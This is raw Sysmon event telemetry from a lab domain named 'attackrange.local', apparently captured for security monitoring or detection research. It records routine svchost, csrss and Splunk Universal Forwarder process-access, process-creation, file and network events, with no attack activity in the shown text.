07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:24.343{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.312{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.843{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E1F6FDCBC4E8DE65B6A793ABDE13D5D,SHA256=565FAE91DD53E0FA47C645C7531835CCE8EAD51238A18EA99648A25828557251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:25.041{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AEBA23415745FBD56FD503C76945CEC,SHA256=17F44A8698D034BBCA221167741890F203B84F03DA30274B91AE818E70AA44A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.780{0C1E0330-F65D-60EB-A679-00000000D001}29121532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.640{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.625{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.546{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF2C193B54D23136B2175C63B854107B,SHA256=1789E6722C019973E89EF0C8DF785AE4458F4A804975ACD284908DE837F55C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.546{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1EE1415AC55FB2158BAAD41B74D1297,SHA256=7410051FF406EDE76B1F1BCB6A47733F512DC02DEE2598A646A8C72082026B39,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:23.334{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57357-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000808839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.015{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 